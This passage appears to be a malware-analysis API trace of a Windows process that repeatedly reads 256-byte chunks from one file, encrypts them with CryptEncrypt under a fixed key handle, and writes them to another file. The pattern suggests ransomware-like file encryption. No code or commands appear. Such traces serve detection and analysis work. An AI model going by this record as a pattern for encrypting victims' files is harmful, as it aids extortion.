dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.440] GetLastError () returned 0x0 [0170.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.440] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.440] GetLastError () returned 0x0 [0170.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.440] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.440] GetLastError () returned 0x0 [0170.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.441] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.441] GetLastError () returned 0x0 [0170.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.441] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.441] GetLastError () returned 0x0 [0170.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.441] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.441] GetLastError () returned 0x0 [0170.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.441] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.441] GetLastError () returned 0x0 [0170.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.441] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.441] GetLastError () returned 0x0 [0170.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.442] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.442] GetLastError () returned 0x0 [0170.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.442] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.442] GetLastError () returned 0x0 [0170.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.442] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.442] GetLastError () returned 0x0 [0170.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.442] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.442] GetLastError () returned 0x0 [0170.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.442] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.442] GetLastError () returned 0x0 [0170.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.443] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.443] GetLastError () returned 0x0 [0170.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.443] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.443] GetLastError () returned 0x0 [0170.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.443] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.443] GetLastError () returned 0x0 [0170.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.443] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.443] GetLastError () returned 0x0 [0170.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.443] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.443] GetLastError () returned 0x0 [0170.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.444] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.444] GetLastError () returned 0x0 [0170.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.444] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.444] GetLastError () returned 0x0 [0170.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.444] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.444] GetLastError () returned 0x0 [0170.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.444] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.444] GetLastError () returned 0x0 [0170.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.444] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.444] GetLastError () returned 0x0 [0170.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.445] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.445] GetLastError () returned 0x0 [0170.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.445] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.445] GetLastError () returned 0x0 [0170.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.445] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.445] GetLastError () returned 0x0 [0170.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.445] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.445] GetLastError () returned 0x0 [0170.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.445] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.445] GetLastError () returned 0x0 [0170.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.446] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.446] GetLastError () returned 0x0 [0170.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.446] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.446] GetLastError () returned 0x0 [0170.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.446] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.446] GetLastError () returned 0x0 [0170.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.446] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.446] GetLastError () returned 0x0 [0170.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.446] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.446] GetLastError () returned 0x0 [0170.446] WriteFile 